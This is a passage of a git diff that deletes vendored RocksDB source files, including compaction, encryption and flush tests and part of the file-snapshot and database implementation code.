-      ASSERT_TRUE(db_->GetIntProperty("rocksdb.background-errors", &int_prop));
-      ASSERT_EQ(0U, int_prop);
-
-      // Verify DB
-      for (int j = 0; j < 2; j++) {
-        verify_func();
-        if (j == 0) {
-          Reopen(options);
-        }
-      }
-
-      // Test compact range works
-      dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-      // All data should be in the last level.
-      ColumnFamilyMetaData cf_meta;
-      db_->GetColumnFamilyMetaData(&cf_meta);
-      ASSERT_EQ(5U, cf_meta.levels.size());
-      for (int i = 0; i < 4; i++) {
-        ASSERT_EQ(0U, cf_meta.levels[i].files.size());
-      }
-      ASSERT_GT(cf_meta.levels[4U].files.size(), 0U);
-      verify_func();
-
-      Close();
-    }
-  }
-
-  env_->SetBackgroundThreads(1, Env::LOW);
-  env_->SetBackgroundThreads(1, Env::HIGH);
-}
-
-// Test specific cases in dynamic max bytes
-TEST_F(DBTestDynamicLevel, DynamicLevelMaxBytesBase2) {
-  Random rnd(301);
-  int kMaxKey = 1000000;
-
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.write_buffer_size = 20480;
-  options.max_write_buffer_number = 2;
-  options.level0_file_num_compaction_trigger = 2;
-  options.level0_slowdown_writes_trigger = 9999;
-  options.level0_stop_writes_trigger = 9999;
-  options.target_file_size_base = 9102;
-  options.level_compaction_dynamic_level_bytes = true;
-  options.max_bytes_for_level_base = 40960;
-  options.max_bytes_for_level_multiplier = 4;
-  options.max_background_compactions = 2;
-  options.num_levels = 5;
-  options.max_compaction_bytes = 0;  // Force not expanding in compactions
-  BlockBasedTableOptions table_options;
-  table_options.block_size = 1024;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  DestroyAndReopen(options);
-  ASSERT_OK(dbfull()->SetOptions({
-      {"disable_auto_compactions", "true"},
-  }));
-
-  uint64_t int_prop;
-  std::string str_prop;
-
-  // Initial base level is the last level
-  ASSERT_TRUE(db_->GetIntProperty("rocksdb.base-level", &int_prop));
-  ASSERT_EQ(4U, int_prop);
-
-  // Put about 28K to L0
-  for (int i = 0; i < 70; i++) {
-    ASSERT_OK(Put(Key(static_cast<int>(rnd.Uniform(kMaxKey))),
-                  RandomString(&rnd, 380)));
-  }
-  ASSERT_OK(dbfull()->SetOptions({
-      {"disable_auto_compactions", "false"},
-  }));
-  Flush();
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_TRUE(db_->GetIntProperty("rocksdb.base-level", &int_prop));
-  ASSERT_EQ(4U, int_prop);
-
-  // Insert extra about 28K to L0. After they are compacted to L4, base level
-  // should be changed to L3.
-  ASSERT_OK(dbfull()->SetOptions({
-      {"disable_auto_compactions", "true"},
-  }));
-  for (int i = 0; i < 70; i++) {
-    ASSERT_OK(Put(Key(static_cast<int>(rnd.Uniform(kMaxKey))),
-                  RandomString(&rnd, 380)));
-  }
-
-  ASSERT_OK(dbfull()->SetOptions({
-      {"disable_auto_compactions", "false"},
-  }));
-  Flush();
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_TRUE(db_->GetIntProperty("rocksdb.base-level", &int_prop));
-  ASSERT_EQ(3U, int_prop);
-  ASSERT_TRUE(db_->GetProperty("rocksdb.num-files-at-level1", &str_prop));
-  ASSERT_EQ("0", str_prop);
-  ASSERT_TRUE(db_->GetProperty("rocksdb.num-files-at-level2", &str_prop));
-  ASSERT_EQ("0", str_prop);
-
-  // Trigger parallel compaction, and the first one would change the base
-  // level.
-  // Hold compaction jobs to make sure
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "CompactionJob::Run():Start",
-      [&](void* arg) { env_->SleepForMicroseconds(100000); });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  ASSERT_OK(dbfull()->SetOptions({
-      {"disable_auto_compactions", "true"},
-  }));
-  // Write about 40K more
-  for (int i = 0; i < 100; i++) {
-    ASSERT_OK(Put(Key(static_cast<int>(rnd.Uniform(kMaxKey))),
-                  RandomString(&rnd, 380)));
-  }
-  ASSERT_OK(dbfull()->SetOptions({
-      {"disable_auto_compactions", "false"},
-  }));
-  Flush();
-  // Wait for 200 milliseconds before proceeding compactions to make sure two
-  // parallel ones are executed.
-  env_->SleepForMicroseconds(200000);
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_TRUE(db_->GetIntProperty("rocksdb.base-level", &int_prop));
-  ASSERT_EQ(3U, int_prop);
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  // Trigger a condition that the compaction changes base level and L0->Lbase
-  // happens at the same time.
-  // We try to make last levels' targets to be 40K, 160K, 640K, add triggers
-  // another compaction from 40K->160K.
-  ASSERT_OK(dbfull()->SetOptions({
-      {"disable_auto_compactions", "true"},
-  }));
-  // Write about 650K more.
-  // Each file is about 11KB, with 9KB of data.
-  for (int i = 0; i < 1300; i++) {
-    ASSERT_OK(Put(Key(static_cast<int>(rnd.Uniform(kMaxKey))),
-                  RandomString(&rnd, 380)));
-  }
-  ASSERT_OK(dbfull()->SetOptions({
-      {"disable_auto_compactions", "false"},
-  }));
-  Flush();
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_TRUE(db_->GetIntProperty("rocksdb.base-level", &int_prop));
-  ASSERT_EQ(2U, int_prop);
-
-  // A manual compaction will trigger the base level to become L2
-  // Keep Writing data until base level changed 2->1. There will be L0->L2
-  // compaction going on at the same time.
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"CompactionJob::Run():Start", "DynamicLevelMaxBytesBase2:0"},
-      {"DynamicLevelMaxBytesBase2:1", "CompactionJob::Run():End"},
-      {"DynamicLevelMaxBytesBase2:compact_range_finish",
-       "FlushJob::WriteLevel0Table"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rocksdb::port::Thread thread([this] {
-    TEST_SYNC_POINT("DynamicLevelMaxBytesBase2:compact_range_start");
-    ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-    TEST_SYNC_POINT("DynamicLevelMaxBytesBase2:compact_range_finish");
-  });
-
-  TEST_SYNC_POINT("DynamicLevelMaxBytesBase2:0");
-  for (int i = 0; i < 2; i++) {
-    ASSERT_OK(Put(Key(static_cast<int>(rnd.Uniform(kMaxKey))),
-                  RandomString(&rnd, 380)));
-  }
-  TEST_SYNC_POINT("DynamicLevelMaxBytesBase2:1");
-
-  Flush();
-
-  thread.join();
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-
-  ASSERT_TRUE(db_->GetIntProperty("rocksdb.base-level", &int_prop));
-  ASSERT_EQ(1U, int_prop);
-}
-
-// Test specific cases in dynamic max bytes
-TEST_F(DBTestDynamicLevel, DynamicLevelMaxBytesCompactRange) {
-  Random rnd(301);
-  int kMaxKey = 1000000;
-
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.write_buffer_size = 2048;
-  options.max_write_buffer_number = 2;
-  options.level0_file_num_compaction_trigger = 2;
-  options.level0_slowdown_writes_trigger = 9999;
-  options.level0_stop_writes_trigger = 9999;
-  options.target_file_size_base = 2;
-  options.level_compaction_dynamic_level_bytes = true;
-  options.max_bytes_for_level_base = 10240;
-  options.max_bytes_for_level_multiplier = 4;
-  options.max_background_compactions = 1;
-  const int kNumLevels = 5;
-  options.num_levels = kNumLevels;
-  options.max_compaction_bytes = 1;  // Force not expanding in compactions
-  BlockBasedTableOptions table_options;
-  table_options.block_size = 1024;
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  DestroyAndReopen(options);
-
-  // Compact against empty DB
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-
-  uint64_t int_prop;
-  std::string str_prop;
-
-  // Initial base level is the last level
-  ASSERT_TRUE(db_->GetIntProperty("rocksdb.base-level", &int_prop));
-  ASSERT_EQ(4U, int_prop);
-
-  // Put about 7K to L0
-  for (int i = 0; i < 140; i++) {
-    ASSERT_OK(Put(Key(static_cast<int>(rnd.Uniform(kMaxKey))),
-                  RandomString(&rnd, 80)));
-  }
-  Flush();
-  dbfull()->TEST_WaitForCompact();
-  if (NumTableFilesAtLevel(0) == 0) {
-    // Make sure level 0 is not empty
-    ASSERT_OK(Put(Key(static_cast<int>(rnd.Uniform(kMaxKey))),
-                  RandomString(&rnd, 80)));
-    Flush();
-  }
-
-  ASSERT_TRUE(db_->GetIntProperty("rocksdb.base-level", &int_prop));
-  ASSERT_EQ(3U, int_prop);
-  ASSERT_TRUE(db_->GetProperty("rocksdb.num-files-at-level1", &str_prop));
-  ASSERT_EQ("0", str_prop);
-  ASSERT_TRUE(db_->GetProperty("rocksdb.num-files-at-level2", &str_prop));
-  ASSERT_EQ("0", str_prop);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-
-  std::set<int> output_levels;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "CompactionPicker::CompactRange:Return", [&](void* arg) {
-        Compaction* compaction = reinterpret_cast<Compaction*>(arg);
-        output_levels.insert(compaction->output_level());
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  dbfull()->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-  ASSERT_EQ(output_levels.size(), 2);
-  ASSERT_TRUE(output_levels.find(3) != output_levels.end());
-  ASSERT_TRUE(output_levels.find(4) != output_levels.end());
-  ASSERT_TRUE(db_->GetProperty("rocksdb.num-files-at-level0", &str_prop));
-  ASSERT_EQ("0", str_prop);
-  ASSERT_TRUE(db_->GetProperty("rocksdb.num-files-at-level3", &str_prop));
-  ASSERT_EQ("0", str_prop);
-  // Base level is still level 3.
-  ASSERT_TRUE(db_->GetIntProperty("rocksdb.base-level", &int_prop));
-  ASSERT_EQ(3U, int_prop);
-}
-
-TEST_F(DBTestDynamicLevel, DynamicLevelMaxBytesBaseInc) {
-  Options options = CurrentOptions();
-  options.create_if_missing = true;
-  options.write_buffer_size = 2048;
-  options.max_write_buffer_number = 2;
-  options.level0_file_num_compaction_trigger = 2;
-  options.level0_slowdown_writes_trigger = 2;
-  options.level0_stop_writes_trigger = 2;
-  options.target_file_size_base = 2048;
-  options.level_compaction_dynamic_level_bytes = true;
-  options.max_bytes_for_level_base = 10240;
-  options.max_bytes_for_level_multiplier = 4;
-  options.soft_rate_limit = 1.1;
-  options.max_background_compactions = 2;
-  options.num_levels = 5;
-  options.max_compaction_bytes = 100000000;
-
-  DestroyAndReopen(options);
-
-  int non_trivial = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:NonTrivial",
-      [&](void* arg) { non_trivial++; });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  Random rnd(301);
-  const int total_keys = 3000;
-  const int random_part_size = 100;
-  for (int i = 0; i < total_keys; i++) {
-    std::string value = RandomString(&rnd, random_part_size);
-    PutFixed32(&value, static_cast<uint32_t>(i));
-    ASSERT_OK(Put(Key(i), value));
-  }
-  Flush();
-  dbfull()->TEST_WaitForCompact();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  ASSERT_EQ(non_trivial, 0);
-
-  for (int i = 0; i < total_keys; i++) {
-    std::string value = Get(Key(i));
-    ASSERT_EQ(DecodeFixed32(value.c_str() + random_part_size),
-              static_cast<uint32_t>(i));
-  }
-
-  env_->SetBackgroundThreads(1, Env::LOW);
-  env_->SetBackgroundThreads(1, Env::HIGH);
-}
-
-TEST_F(DBTestDynamicLevel, DISABLED_MigrateToDynamicLevelMaxBytesBase) {
-  Random rnd(301);
-  const int kMaxKey = 2000;
-
-  Options options;
-  options.create_if_missing = true;
-  options.write_buffer_size = 2048;
-  options.max_write_buffer_number = 8;
-  options.level0_file_num_compaction_trigger = 4;
-  options.level0_slowdown_writes_trigger = 4;
-  options.level0_stop_writes_trigger = 8;
-  options.target_file_size_base = 2048;
-  options.level_compaction_dynamic_level_bytes = false;
-  options.max_bytes_for_level_base = 10240;
-  options.max_bytes_for_level_multiplier = 4;
-  options.soft_rate_limit = 1.1;
-  options.num_levels = 8;
-
-  DestroyAndReopen(options);
-
-  auto verify_func = [&](int num_keys, bool if_sleep) {
-    for (int i = 0; i < num_keys; i++) {
-      ASSERT_NE("NOT_FOUND", Get(Key(kMaxKey + i)));
-      if (i < num_keys / 10) {
-        ASSERT_EQ("NOT_FOUND", Get(Key(i)));
-      } else {
-        ASSERT_NE("NOT_FOUND", Get(Key(i)));
-      }
-      if (if_sleep && i % 1000 == 0) {
-        // Without it, valgrind may choose not to give another
-        // thread a chance to run before finishing the function,
-        // causing the test to be extremely slow.
-        env_->SleepForMicroseconds(1);
-      }
-    }
-  };
-
-  int total_keys = 1000;
-  for (int i = 0; i < total_keys; i++) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 102)));
-    ASSERT_OK(Put(Key(kMaxKey + i), RandomString(&rnd, 102)));
-    ASSERT_OK(Delete(Key(i / 10)));
-  }
-  verify_func(total_keys, false);
-  dbfull()->TEST_WaitForCompact();
-
-  options.level_compaction_dynamic_level_bytes = true;
-  options.disable_auto_compactions = true;
-  Reopen(options);
-  verify_func(total_keys, false);
-
-  std::atomic_bool compaction_finished;
-  compaction_finished = false;
-  // Issue manual compaction in one thread and still verify DB state
-  // in main thread.
-  rocksdb::port::Thread t([&]() {
-    CompactRangeOptions compact_options;
-    compact_options.change_level = true;
-    compact_options.target_level = options.num_levels - 1;
-    dbfull()->CompactRange(compact_options, nullptr, nullptr);
-    compaction_finished.store(true);
-  });
-  do {
-    verify_func(total_keys, true);
-  } while (!compaction_finished.load());
-  t.join();
-
-  ASSERT_OK(dbfull()->SetOptions({
-      {"disable_auto_compactions", "false"},
-  }));
-
-  int total_keys2 = 2000;
-  for (int i = total_keys; i < total_keys2; i++) {
-    ASSERT_OK(Put(Key(i), RandomString(&rnd, 102)));
-    ASSERT_OK(Put(Key(kMaxKey + i), RandomString(&rnd, 102)));
-    ASSERT_OK(Delete(Key(i / 10)));
-  }
-
-  verify_func(total_keys2, false);
-  dbfull()->TEST_WaitForCompact();
-  verify_func(total_keys2, false);
-
-  // Base level is not level 1
-  ASSERT_EQ(NumTableFilesAtLevel(1), 0);
-  ASSERT_EQ(NumTableFilesAtLevel(2), 0);
-}
-}  // namespace rocksdb
-
-#endif  // !defined(ROCKSDB_LITE)
-
-int main(int argc, char** argv) {
-#if !defined(ROCKSDB_LITE)
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-#else
-  return 0;
-#endif
-}
diff --git a/thirdparty/rocksdb/db/db_encryption_test.cc b/thirdparty/rocksdb/db/db_encryption_test.cc
deleted file mode 100644
index 38eee56..0000000
--- a/thirdparty/rocksdb/db/db_encryption_test.cc
+++ /dev/null
@@ -1,94 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-#include "rocksdb/perf_context.h"
-#if !defined(ROCKSDB_LITE)
-#include "util/sync_point.h"
-#endif
-#include <iostream>
-#include <string>
-
-namespace rocksdb {
-
-class DBEncryptionTest : public DBTestBase {
- public:
-  DBEncryptionTest() : DBTestBase("/db_encryption_test") {}
-};
-
-#ifndef ROCKSDB_LITE
-
-TEST_F(DBEncryptionTest, CheckEncrypted) {
-  ASSERT_OK(Put("foo567", "v1.fetdq"));
-  ASSERT_OK(Put("bar123", "v2.dfgkjdfghsd"));
-  Close();
-
-  // Open all files and look for the values we've put in there.
-  // They should not be found if encrypted, otherwise
-  // they should be found.
-  std::vector<std::string> fileNames;
-  auto status = env_->GetChildren(dbname_, &fileNames);
-  ASSERT_OK(status);
-
-  auto defaultEnv = Env::Default();
-  int hits = 0;
-  for (auto it = fileNames.begin() ; it != fileNames.end(); ++it) {
-    if ((*it == "..") || (*it == ".")) {
-      continue;
-    }
-    auto filePath = dbname_ + "/" + *it;
-    unique_ptr<SequentialFile> seqFile;
-    auto envOptions = EnvOptions(CurrentOptions());
-    status = defaultEnv->NewSequentialFile(filePath, &seqFile, envOptions);
-    ASSERT_OK(status);
-
-    uint64_t fileSize;
-    status = defaultEnv->GetFileSize(filePath, &fileSize);
-    ASSERT_OK(status);
-
-    std::string scratch;
-    scratch.reserve(fileSize);
-    Slice data;
-    status = seqFile->Read(fileSize, &data, (char*)scratch.data());
-    ASSERT_OK(status);
-
-    if (data.ToString().find("foo567") != std::string::npos) {
-      hits++; 
-      //std::cout << "Hit in " << filePath << "\n";
-    }
-    if (data.ToString().find("v1.fetdq") != std::string::npos) {
-      hits++; 
-      //std::cout << "Hit in " << filePath << "\n";
-    }
-    if (data.ToString().find("bar123") != std::string::npos) {
-      hits++; 
-      //std::cout << "Hit in " << filePath << "\n";
-    }
-    if (data.ToString().find("v2.dfgkjdfghsd") != std::string::npos) {
-      hits++; 
-      //std::cout << "Hit in " << filePath << "\n";
-    }
-    if (data.ToString().find("dfgk") != std::string::npos) {
-      hits++; 
-      //std::cout << "Hit in " << filePath << "\n";
-    }
-  }
-  if (encrypted_env_) {
-    ASSERT_EQ(hits, 0);
-  } else {
-    ASSERT_GE(hits, 4);
-  }
-}
-
-#endif // ROCKSDB_LITE
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_filesnapshot.cc b/thirdparty/rocksdb/db/db_filesnapshot.cc
deleted file mode 100644
index e266bf1..0000000
--- a/thirdparty/rocksdb/db/db_filesnapshot.cc
+++ /dev/null
@@ -1,149 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <stdint.h>
-#include <algorithm>
-#include <string>
-#include "db/db_impl.h"
-#include "db/job_context.h"
-#include "db/version_set.h"
-#include "port/port.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "util/file_util.h"
-#include "util/filename.h"
-#include "util/mutexlock.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-Status DBImpl::DisableFileDeletions() {
-  InstrumentedMutexLock l(&mutex_);
-  ++disable_delete_obsolete_files_;
-  if (disable_delete_obsolete_files_ == 1) {
-    ROCKS_LOG_INFO(immutable_db_options_.info_log, "File Deletions Disabled");
-  } else {
-    ROCKS_LOG_WARN(immutable_db_options_.info_log,
-                   "File Deletions Disabled, but already disabled. Counter: %d",
-                   disable_delete_obsolete_files_);
-  }
-  return Status::OK();
-}
-
-Status DBImpl::EnableFileDeletions(bool force) {
-  // Job id == 0 means that this is not our background process, but rather
-  // user thread
-  JobContext job_context(0);
-  bool should_purge_files = false;
-  {
-    InstrumentedMutexLock l(&mutex_);
-    if (force) {
-      // if force, we need to enable file deletions right away
-      disable_delete_obsolete_files_ = 0;
-    } else if (disable_delete_obsolete_files_ > 0) {
-      --disable_delete_obsolete_files_;
-    }
-    if (disable_delete_obsolete_files_ == 0)  {
-      ROCKS_LOG_INFO(immutable_db_options_.info_log, "File Deletions Enabled");
-      should_purge_files = true;
-      FindObsoleteFiles(&job_context, true);
-    } else {
-      ROCKS_LOG_WARN(
-          immutable_db_options_.info_log,
-          "File Deletions Enable, but not really enabled. Counter: %d",
-          disable_delete_obsolete_files_);
-    }
-  }
-  if (should_purge_files)  {
-    PurgeObsoleteFiles(job_context);
-  }
-  job_context.Clean();
-  LogFlush(immutable_db_options_.info_log);
-  return Status::OK();
-}
-
-int DBImpl::IsFileDeletionsEnabled() const {
-  return disable_delete_obsolete_files_;
-}
-
-Status DBImpl::GetLiveFiles(std::vector<std::string>& ret,
-                            uint64_t* manifest_file_size,
-                            bool flush_memtable) {
-  *manifest_file_size = 0;
-
-  mutex_.Lock();
-
-  if (flush_memtable) {
-    // flush all dirty data to disk.
-    Status status;
-    for (auto cfd : *versions_->GetColumnFamilySet()) {
-      if (cfd->IsDropped()) {
-        continue;
-      }
-      cfd->Ref();
-      mutex_.Unlock();
-      status = FlushMemTable(cfd, FlushOptions());
-      TEST_SYNC_POINT("DBImpl::GetLiveFiles:1");
-      TEST_SYNC_POINT("DBImpl::GetLiveFiles:2");
-      mutex_.Lock();
-      cfd->Unref();
-      if (!status.ok()) {
-        break;
-      }
-    }
-    versions_->GetColumnFamilySet()->FreeDeadColumnFamilies();
-
-    if (!status.ok()) {
-      mutex_.Unlock();
-      ROCKS_LOG_ERROR(immutable_db_options_.info_log, "Cannot Flush data %s\n",
-                      status.ToString().c_str());
-      return status;
-    }
-  }
-
-  // Make a set of all of the live *.sst files
-  std::vector<FileDescriptor> live;
-  for (auto cfd : *versions_->GetColumnFamilySet()) {
-    if (cfd->IsDropped()) {
-      continue;
-    }
-    cfd->current()->AddLiveFiles(&live);
-  }
-
-  ret.clear();
-  ret.reserve(live.size() + 3);  // *.sst + CURRENT + MANIFEST + OPTIONS
-
-  // create names of the live files. The names are not absolute
-  // paths, instead they are relative to dbname_;
-  for (auto live_file : live) {
-    ret.push_back(MakeTableFileName("", live_file.GetNumber()));
-  }
-
-  ret.push_back(CurrentFileName(""));
-  ret.push_back(DescriptorFileName("", versions_->manifest_file_number()));
-  ret.push_back(OptionsFileName("", versions_->options_file_number()));
-
-  // find length of manifest file while holding the mutex lock
-  *manifest_file_size = versions_->manifest_file_size();
-
-  mutex_.Unlock();
-  return Status::OK();
-}
-
-Status DBImpl::GetSortedWalFiles(VectorLogPtr& files) {
-  return wal_manager_.GetSortedWalFiles(files);
-}
-
-}
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/db_flush_test.cc b/thirdparty/rocksdb/db/db_flush_test.cc
deleted file mode 100644
index 107e824..0000000
--- a/thirdparty/rocksdb/db/db_flush_test.cc
+++ /dev/null
@@ -1,162 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-#include "util/fault_injection_test_env.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-class DBFlushTest : public DBTestBase {
- public:
-  DBFlushTest() : DBTestBase("/db_flush_test") {}
-};
-
-class DBFlushDirectIOTest : public DBFlushTest,
-                            public ::testing::WithParamInterface<bool> {
- public:
-  DBFlushDirectIOTest() : DBFlushTest() {}
-};
-
-// We had issue when two background threads trying to flush at the same time,
-// only one of them get committed. The test verifies the issue is fixed.
-TEST_F(DBFlushTest, FlushWhileWritingManifest) {
-  Options options;
-  options.disable_auto_compactions = true;
-  options.max_background_flushes = 2;
-  options.env = env_;
-  Reopen(options);
-  FlushOptions no_wait;
-  no_wait.wait = false;
-
-  SyncPoint::GetInstance()->LoadDependency(
-      {{"VersionSet::LogAndApply:WriteManifest",
-        "DBFlushTest::FlushWhileWritingManifest:1"},
-       {"MemTableList::InstallMemtableFlushResults:InProgress",
-        "VersionSet::LogAndApply:WriteManifestDone"}});
-  SyncPoint::GetInstance()->EnableProcessing();
-
-  ASSERT_OK(Put("foo", "v"));
-  ASSERT_OK(dbfull()->Flush(no_wait));
-  TEST_SYNC_POINT("DBFlushTest::FlushWhileWritingManifest:1");
-  ASSERT_OK(Put("bar", "v"));
-  ASSERT_OK(dbfull()->Flush(no_wait));
-  // If the issue is hit we will wait here forever.
-  dbfull()->TEST_WaitForFlushMemTable();
-#ifndef ROCKSDB_LITE
-  ASSERT_EQ(2, TotalTableFiles());
-#endif  // ROCKSDB_LITE
-}
-
-TEST_F(DBFlushTest, SyncFail) {
-  std::unique_ptr<FaultInjectionTestEnv> fault_injection_env(
-      new FaultInjectionTestEnv(env_));
-  Options options;
-  options.disable_auto_compactions = true;
-  options.env = fault_injection_env.get();
-
-  SyncPoint::GetInstance()->LoadDependency(
-      {{"DBFlushTest::SyncFail:1", "DBImpl::SyncClosedLogs:Start"},
-       {"DBImpl::SyncClosedLogs:Failed", "DBFlushTest::SyncFail:2"}});
-  SyncPoint::GetInstance()->EnableProcessing();
-
-  Reopen(options);
-  Put("key", "value");
-  auto* cfd =
-      reinterpret_cast<ColumnFamilyHandleImpl*>(db_->DefaultColumnFamily())
-          ->cfd();
-  int refs_before = cfd->current()->TEST_refs();
-  FlushOptions flush_options;
-  flush_options.wait = false;
-  ASSERT_OK(dbfull()->Flush(flush_options));
-  fault_injection_env->SetFilesystemActive(false);
-  TEST_SYNC_POINT("DBFlushTest::SyncFail:1");
-  TEST_SYNC_POINT("DBFlushTest::SyncFail:2");
-  fault_injection_env->SetFilesystemActive(true);
-  dbfull()->TEST_WaitForFlushMemTable();
-#ifndef ROCKSDB_LITE
-  ASSERT_EQ("", FilesPerLevel());  // flush failed.
-#endif                             // ROCKSDB_LITE
-  // Flush job should release ref count to current version.
-  ASSERT_EQ(refs_before, cfd->current()->TEST_refs());
-  Destroy(options);
-}
-
-TEST_F(DBFlushTest, FlushInLowPriThreadPool) {
-  // Verify setting an empty high-pri (flush) thread pool causes flushes to be
-  // scheduled in the low-pri (compaction) thread pool.
-  Options options = CurrentOptions();
-  options.level0_file_num_compaction_trigger = 4;
-  options.memtable_factory.reset(new SpecialSkipListFactory(1));
-  Reopen(options);
-  env_->SetBackgroundThreads(0, Env::HIGH);
-
-  std::thread::id tid;
-  int num_flushes = 0, num_compactions = 0;
-  SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BGWorkFlush", [&](void* arg) {
-        if (tid == std::thread::id()) {
-          tid = std::this_thread::get_id();
-        } else {
-          ASSERT_EQ(tid, std::this_thread::get_id());
-        }
-        ++num_flushes;
-      });
-  SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BGWorkCompaction", [&](void* arg) {
-        ASSERT_EQ(tid, std::this_thread::get_id());
-        ++num_compactions;
-      });
-  SyncPoint::GetInstance()->EnableProcessing();
-
-  ASSERT_OK(Put("key", "val"));
-  for (int i = 0; i < 4; ++i) {
-    ASSERT_OK(Put("key", "val"));
-    dbfull()->TEST_WaitForFlushMemTable();
-  }
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ(4, num_flushes);
-  ASSERT_EQ(1, num_compactions);
-}
-
-TEST_P(DBFlushDirectIOTest, DirectIO) {
-  Options options;
-  options.create_if_missing = true;
-  options.disable_auto_compactions = true;
-  options.max_background_flushes = 2;
-  options.use_direct_io_for_flush_and_compaction = GetParam();
-  options.env = new MockEnv(Env::Default());
-  SyncPoint::GetInstance()->SetCallBack(
-      "BuildTable:create_file", [&](void* arg) {
-        bool* use_direct_writes = static_cast<bool*>(arg);
-        ASSERT_EQ(*use_direct_writes,
-                  options.use_direct_io_for_flush_and_compaction);
-      });
-
-  SyncPoint::GetInstance()->EnableProcessing();
-  Reopen(options);
-  ASSERT_OK(Put("foo", "v"));
-  FlushOptions flush_options;
-  flush_options.wait = true;
-  ASSERT_OK(dbfull()->Flush(flush_options));
-  Destroy(options);
-  delete options.env;
-}
-
-INSTANTIATE_TEST_CASE_P(DBFlushDirectIOTest, DBFlushDirectIOTest,
-                        testing::Bool());
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_impl.cc b/thirdparty/rocksdb/db/db_impl.cc
deleted file mode 100644
index d1bfe41..0000000
--- a/thirdparty/rocksdb/db/db_impl.cc
+++ /dev/null
@@ -1,2823 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#include "db/db_impl.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-#include <inttypes.h>
-#include <stdint.h>
-#ifdef OS_SOLARIS
-#include <alloca.h>
-#endif
-
-#include <algorithm>
-#include <climits>
-#include <cstdio>
-#include <map>
-#include <set>
-#include <stdexcept>
-#include <string>
-#include <unordered_map>
-#include <unordered_set>
-#include <utility>
-#include <vector>
-
-#include "db/builder.h"
-#include "db/compaction_job.h"
-#include "db/db_info_dumper.h"
-#include "db/db_iter.h"
-#include "db/dbformat.h"
-#include "db/event_helpers.h"
-#include "db/external_sst_file_ingestion_job.h"
-#include "db/flush_job.h"
-#include "db/forward_iterator.h"
-#include "db/job_context.h"
-#include "db/log_reader.h"
-#include "db/log_writer.h"
-#include "db/malloc_stats.h"
-#include "db/managed_iterator.h"
-#include "db/memtable.h"
-#include "db/memtable_list.h"
